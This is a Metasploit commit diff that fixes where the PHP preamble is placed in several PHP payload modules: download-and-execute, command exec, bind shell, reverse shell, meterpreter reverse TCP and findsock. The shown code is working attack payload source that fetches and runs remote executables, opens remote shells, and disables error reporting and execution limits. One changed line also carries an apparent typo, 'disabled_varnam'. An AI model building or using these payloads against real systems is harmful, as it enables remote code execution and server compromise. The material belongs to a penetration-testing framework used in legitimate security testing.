Land rapid7#7904, Fix a bug where PHP tags were in the wrong place

Author: pbarry-r7

lib/msf/core/exploit/php_exe.rb

@@ -52,14 +52,13 @@ def get_write_exec_payload(opts={})
       end
       p = Rex::Text.encode_base64(generate_payload_exe)
       php = %Q{
-      error_reporting(0);
+      #{php_preamble}
       $ex = "#{bin_name}";
       $f = fopen($ex, "wb");
       fwrite($f, base64_decode("#{p}"));
       fclose($f);
       chmod($ex, 0777);
       function my_cmd($cmd) {
-      #{php_preamble}
       #{php_system_block};
       }
       if (FALSE === strpos(strtolower(PHP_OS), 'win' )) {

lib/msf/core/payload/php.rb

@@ -26,6 +26,7 @@ def php_preamble(options = {})
     # Canonicalize the list of disabled functions to facilitate choosing a
     # system-like function later.
     preamble = "/*<?php /**/
+      @error_reporting(0);
       @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
       #{dis}=@ini_get('disable_functions');
       if(!empty(#{dis})){

lib/msf/core/payload/php/bind_tcp.rb

@@ -86,7 +86,7 @@ def generate_bind_tcp(opts={})
 
     php << php_send_uuid if include_send_uuid
 
-    php << %Q^switch ($s_type) { 
+    php << %Q^switch ($s_type) {
 case 'stream': $len = fread($s, 4); break;
 case 'socket': $len = socket_read($s, 4); break;
 }

modules/payloads/singles/php/bind_php.rb

@@ -43,7 +43,7 @@ def php_bind_shell
 
     dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4);
     shell = <<-END_OF_PHP_CODE
-    #{php_preamble({:disabled_varname => dis})}
+    #{php_preamble(disabled_varname: dis)}
     $port=#{datastore['LPORT']};
 
     $scl='socket_create_listen';

modules/payloads/singles/php/download_exec.rb

@@ -40,6 +40,7 @@ def php_exec_file
     exename = Rex::Text.rand_text_alpha(rand(8) + 4)
     dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
     shell = <<-END_OF_PHP_CODE
+    #{php_preamble(disabled_varname: dis)}
     if (!function_exists('sys_get_temp_dir')) {
       function sys_get_temp_dir() {
         if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }
@@ -55,16 +56,17 @@ def php_exec_file
     }
     $fname = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "#{exename}.exe";
     $fd_in = fopen("#{datastore['URL']}", "rb");
+    if ($fd_in === false) { die(); }
     $fd_out = fopen($fname, "wb");
+    if ($fd_out === false) { die(); }
     while (!feof($fd_in)) {
       fwrite($fd_out, fread($fd_in, 8192));
     }
     fclose($fd_in);
     fclose($fd_out);
     chmod($fname, 0777);
     $c = $fname;
-    #{php_preamble({:disabled_varname => dis})}
-    #{php_system_block({:cmd_varname => "$c", :disabled_varname => dis})}
+    #{php_system_block(cmd_varname: "$c", disabled_varnam: dis)}
     @unlink($fname);
     END_OF_PHP_CODE
 

modules/payloads/singles/php/exec.rb

@@ -37,9 +37,9 @@ def php_exec_cmd
     cmd = Rex::Text.encode_base64(datastore['CMD'])
     dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
     shell = <<-END_OF_PHP_CODE
+    #{php_preamble(disabled_varname: dis)}
     $c = base64_decode("#{cmd}");
-    #{php_preamble({:disabled_varname => dis})}
-    #{php_system_block({:cmd_varname=>"$c", :disabled_varname => dis})}
+    #{php_system_block(cmd_varname: "$c", disabled_varname: dis)}
     END_OF_PHP_CODE
 
     return Rex::Text.compress(shell)

modules/payloads/singles/php/meterpreter_reverse_tcp.rb

@@ -38,7 +38,7 @@ def generate
 
     uuid = generate_payload_uuid
     bytes = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
-    met = met.sub("\"PAYLOAD_UUID\", \"\"", "\"PAYLOAD_UUID\", \"#{bytes}\"")
+    met = met.sub(%q|"PAYLOAD_UUID", ""|, %Q|"PAYLOAD_UUID", "#{bytes}"|)
 
     met.gsub!(/#.*$/, '')
     met = Rex::Text.compress(met)

modules/payloads/singles/php/reverse_php.rb

@@ -66,12 +66,12 @@ def php_reverse_shell
     shell=<<-END_OF_PHP_CODE
     $ipaddr='#{ipaddr}';
     $port=#{port};
-    #{php_preamble({:disabled_varname => "$dis"})}
+    #{php_preamble(disabled_varname: "$dis")}
 
     if(!function_exists('#{exec_funcname}')){
       function #{exec_funcname}($c){
         global $dis;
-        #{php_system_block({:cmd_varname => "$c", :disabled_varname => "$dis", :output_varname => "$o"})}
+        #{php_system_block(cmd_varname: "$c", disabled_varname: "$dis", output_varname: "$o")}
         return $o;
       }
     }

modules/payloads/singles/php/shell_findsock.rb

@@ -50,13 +50,12 @@ def php_findsock
     var_fd  = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
     var_out = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
     shell = <<END_OF_PHP_CODE
-error_reporting(0);
+#{php_preamble}
 print("<html><body>");
 flush();
 
 function mysystem(#{var_cmd}){
-  #{php_preamble()}
-  #{php_system_block({:cmd_varname=>var_cmd, :output_varname => var_out})}
+  #{php_system_block(cmd_varname: var_cmd, output_varname: var_out)}
   return #{var_out};
 }